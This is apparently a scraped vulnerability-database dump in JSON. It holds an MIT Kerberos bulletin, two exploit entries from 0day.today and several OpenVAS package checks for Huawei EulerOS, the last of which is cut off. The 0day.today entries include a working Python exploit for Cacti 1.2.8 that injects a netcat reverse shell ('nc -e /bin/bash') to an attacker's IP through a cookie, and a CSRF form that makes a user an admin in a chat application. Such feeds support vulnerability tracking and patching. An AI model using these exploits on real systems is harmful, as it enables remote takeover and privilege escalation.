{"id": "SECURITYVULNS:VULN:14352", "bulletinFamily": "software", "title": "MIT Kerberos 5 multiple potential security vulnerabilities", "description": "Memory leaks, insufficient memory zeroing, etc.", "published": "2015-04-07T00:00:00", "modified": "2015-04-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14352", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:31879"], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:09:59", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "af079f2cf27fa122e3f3f3ebd97fefef"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "e0ae371bb94714eee2a957b5ef916685"}, {"key": "href", "hash": "d9ef33b8e2f2050396e5992a11355db4"}, {"key": "modified", "hash": "556c83bba2298f056418c3f9ce9da80e"}, {"key": "published", "hash": "556c83bba2298f056418c3f9ce9da80e"}, {"key": "references", "hash": "df7cee2c9573335fa518d025c0e04755"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "e3d01739e363bd7c81bf8c04bd9f0840"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "5027b70e2a0d04224fc35c577e100d972d72c5711fe47be8d6cef85a75b82a4e", "viewCount": 7, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2018-08-31T11:09:59"}, "dependencies": {"references": [{"type": "zeroscience", "idList": ["ZSL-2019-5532", "ZSL-2019-5531", "ZSL-2019-5530"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154361"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108629", "OPENVAS:1361412562310108627", "OPENVAS:1361412562310108626", "OPENVAS:1361412562310108628", "OPENVAS:1361412562310891874", "OPENVAS:1361412562310142662", "OPENVAS:1361412562310142595"]}, {"type": "talosblog", "idList": ["TALOSBLOG:62B868C1729207FF4ED156D86237FD03"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:9781", "WPVDB-ID:9538"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:787E98D1B1057EA67AB600F0E0353E27"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1874-1:A0C54"]}, {"type": "thn", "idList": ["THN:B558B0C3A7F0751B780E63B57717C3F4", "THN:AB717FBC8FF7C7C1D194A126C788DF50"]}, {"type": "cve", "idList": ["CVE-2019-14352"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1702-1"]}], "modified": "2018-08-31T11:09:59"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "affectedSoftware": [{"name": "krb5", "operator": "eq", "version": "1.13"}]}

{"zdt": [{"lastseen": "2020-02-27T21:08:18", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2020-02-27T00:00:00", "published": "2020-02-27T00:00:00", "id": "1337DAY-ID-34030", "href": "https://0day.today/exploit/description/34030", "title": "Cacti 1.2.8 - Unauthenticated Remote Code Execution Exploit", "type": "zdt", "sourceData": "#!/usr/bin/python3\r\n\r\n# Exploit Title: Cacti v1.2.8 Unauthenticated Remote Code Execution\r\n# Exploit Author: Askar (@mohammadaskar2)\r\n# CVE: CVE-2020-8813\r\n# Vendor Homepage: https://cacti.net/\r\n# Version: v1.2.8\r\n# Tested on: CentOS 7.3 / PHP 7.1.33\r\n\r\nimport requests\r\nimport sys\r\nimport warnings\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.parse import quote\r\n\r\nwarnings.filterwarnings(\"ignore\", category=UserWarning, module='bs4')\r\n\r\n\r\nif len(sys.argv) != 4:\r\n print(\"[~] Usage : ./Cacti-exploit.py url ip port\")\r\n exit()\r\n\r\nurl = sys.argv[1]\r\nip = sys.argv[2]\r\nport = sys.argv[3]\r\n\r\ndef send_exploit(url):\r\n payload = \";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s\" % (ip, port)\r\n cookies = {'Cacti': quote(payload)}\r\n path = url+\"/graph_realtime.php?action=init\"\r\n req = requests.get(path)\r\n if req.status_code == 200 and \"poller_realtime.php\" in req.text:\r\n print(\"[+] File Found and Guest is enabled!\")\r\n print(\"[+] Sending malicous request, check your nc ;)\")\r\n requests.get(path, cookies=cookies)\r\n else:\r\n print(\"[+] Error while requesting the file!\")\r\n\r\nsend_exploit(url)\n\n# 0day.today [2020-02-27] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/34030"}, {"lastseen": "2020-02-27T21:08:25", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2020-02-27T00:00:00", "published": "2020-02-27T00:00:00", "id": "1337DAY-ID-34026", "href": "https://0day.today/exploit/description/34026", "title": "Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin) Exploit", "type": "zdt", "sourceData": "# Exploit Title: Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)\r\n# Description: Operator Can Change Role User Type to admin\r\n# Exploit Author: Meisam Monsef\r\n# Vendor Homepage: https://www.bdtask.com/business-live-chat-software.php\r\n# Version: V-1.0\r\n# Tested on: ubuntu\r\n\r\nExploit :\r\n1 - please login or create account\r\n2 - open exploit.html in browser\r\n3 - change you user id input for Change Role User Type to admin\r\n4 - fill input data (fname - lname - email)\r\n5 - click Update Button\r\n6 - logout account\r\n7 - login again you are admin & Enjoying\r\n\r\n<form action=\"https://TARGET/admin/user/users/create\"\r\nenctype=\"multipart/form-data\" method=\"post\" accept-charset=\"utf-8\">\r\nuser_id :\r\n<input type=\"text\" name=\"user_id\" value=\"1\"> <!-- change your user_id -->\r\n<br>\r\nfname :\r\n<input type=\"text\" name=\"fname\" value=\"\" /> <!-- fill your first name -->\r\n<br>\r\nlname :\r\n<input type=\"text\" name=\"lname\" value=\"\" /> <!-- fill your last name -->\r\n<br>\r\nemail :\r\n<input type=\"text\" name=\"email\" value=\"\" /> <!-- fill your email -->\r\n<br>\r\nuser_type :\r\n<input type=\"text\" name=\"user_type\" value=\"1\" />\r\n<br>\r\nstatus :\r\n<input type=\"text\" name=\"status\" value=\"1\" />\r\n<br>\r\n<button type=\"submit\">Update</button>\r\n</form>\n\n# 0day.today [2020-02-27] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/34026"}], "openvas": [{"lastseen": "2020-02-26T16:44:17", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201114", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201114", "title": "Huawei EulerOS: Security Advisory for libgcrypt (EulerOS-SA-2020-1114)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1114\");\n script_version(\"2020-02-24T09:06:45+0000\");\n script_cve_id(\"CVE-2015-0837\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:06:45 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:06:45 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for libgcrypt (EulerOS-SA-2020-1114)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1114\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1114\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'libgcrypt' package(s) announced via the EulerOS-SA-2020-1114 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The mpi_powm function in Libgcrypt before 1.6.3 and GnuPG before 1.4.19 allows attackers to obtain sensitive information by leveraging timing differences when accessing a pre-computed table during modular exponentiation, related to a 'Last-Level Cache Side-Channel Attack.'(CVE-2015-0837)\");\n\n script_tag(name:\"affected\", value:\"'libgcrypt' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libgcrypt\", rpm:\"libgcrypt~1.5.3~14.h4.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgcrypt-devel\", rpm:\"libgcrypt-devel~1.5.3~14.h4.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-02-26T16:44:37", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201115", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201115", "title": "Huawei EulerOS: Security Advisory for libjpeg-turbo (EulerOS-SA-2020-1115)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1115\");\n script_version(\"2020-02-24T09:06:46+0000\");\n script_cve_id(\"CVE-2014-9092\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:06:46 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:06:46 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for libjpeg-turbo (EulerOS-SA-2020-1115)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1115\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1115\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'libjpeg-turbo' package(s) announced via the EulerOS-SA-2020-1115 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"libjpeg-turbo before 1.3.1 allows remote attackers to cause a denial of service (crash) via a crafted JPEG file, related to the Exif marker.(CVE-2014-9092)\");\n\n script_tag(name:\"affected\", value:\"'libjpeg-turbo' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libjpeg-turbo\", rpm:\"libjpeg-turbo~1.2.90~6.h5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjpeg-turbo-devel\", rpm:\"libjpeg-turbo-devel~1.2.90~6.h5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-02-26T16:47:19", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201109", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201109", "title": "Huawei EulerOS: Security Advisory for jakarta-commons-httpclient (EulerOS-SA-2020-1109)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1109\");\n script_version(\"2020-02-24T09:05:08+0000\");\n script_cve_id(\"CVE-2015-5262\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:05:08 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:05:08 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for jakarta-commons-httpclient (EulerOS-SA-2020-1109)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1109\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1109\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'jakarta-commons-httpclient' package(s) announced via the EulerOS-SA-2020-1109 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"http/conn/ssl/SSLConnectionSocketFactory.java in Apache HttpComponents HttpClient before 4.3.6 ignores the http.socket.timeout configuration setting during an SSL handshake, which allows remote attackers to cause a denial of service (HTTPS call hang) via unspecified vectors.(CVE-2015-5262)\");\n\n script_tag(name:\"affected\", value:\"'jakarta-commons-httpclient' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"jakarta-commons-httpclient\", rpm:\"jakarta-commons-httpclient~3.1~16.h1.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-02-26T16:47:42", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201121", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201121", "title": "Huawei EulerOS: Security Advisory for openssl098e (EulerOS-SA-2020-1121)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1121\");\n script_version(\"2020-02-24T09:06:56+0000\");\n script_cve_id(\"CVE-2014-0221\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:06:56 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:06:56 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssl098e (EulerOS-SA-2020-1121)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1121\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1121\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssl098e' package(s) announced via the EulerOS-SA-2020-1121 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The dtls1_get_message_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (recursion and client crash) via a DTLS hello message in an invalid DTLS handshake.(CVE-2014-0221)\");\n\n script_tag(name:\"affected\", value:\"'openssl098e' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl098e\", rpm:\"openssl098e~0.9.8e~29.3.h10.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-02-26T16:44:26", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201123", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201123", "title": "Huawei EulerOS: Security Advisory for perl-Data-Dumper (EulerOS-SA-2020-1123)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1123\");\n script_version(\"2020-02-24T09:06:58+0000\");\n script_cve_id(\"CVE-2014-4330\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:06:58 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:06:58 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for perl-Data-Dumper (EulerOS-SA-2020-1123)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1123\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1123\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'perl-Data-Dumper' package(s) announced via the EulerOS-SA-2020-1123 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Dumper method in Data::Dumper before 2.154, as used in Perl 5.20.1 and earlier, allows context-dependent attackers to cause a denial of service (stack consumption and crash) via an Array-Reference with many nested Array-References, which triggers a large number of recursive calls to the DD_dump function.(CVE-2014-4330)\");\n\n script_tag(name:\"affected\", value:\"'perl-Data-Dumper' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Data-Dumper\", rpm:\"perl-Data-Dumper~2.145~3.h1.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-02-26T16:48:16", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-24T00:00:00", "published": "2020-02-24T00:00:00", "id": "OPENVAS:1361412562311220201104", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201104", "title": "Huawei EulerOS: Security Advisory for gnupg2 (EulerOS-SA-2020-1104)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1104\");\n script_version(\"2020-02-24T09:05:03+0000\");\n script_cve_id(\"CVE-2015-1606\", \"CVE-2015-1607\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-24 09:05:03 +0000 (Mon, 24 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-24 09:05:03 +0000 (Mon, 24 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for gnupg2 (EulerOS-SA-2020-1104)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1104\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1104\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'gnupg2' package(s) announced via the EulerOS-SA-2020-1104 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"kbx/keybox-search.c in GnuPG before 1.4.19, 2.0.x before 2.0.27, and 2.1.x before 2.1.2 does not properly handle bitwise left-shifts, which allows remote attackers to cause a denial of service (invalid read operation) via a crafted keyring file, related to sign extensions and 'memcpy with overlapping ranges.'(CVE-2015-1607)\n\nThe keyring DB in GnuPG before 2.1.2 does not properly handle invalid packets, which allows remote attackers to cause a denial of service (invalid read and use-after-free) via a crafted keyring file.(CVE-2015-1606)\");\n\n script_tag(name:\"affected\", value:\"'gnupg2' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 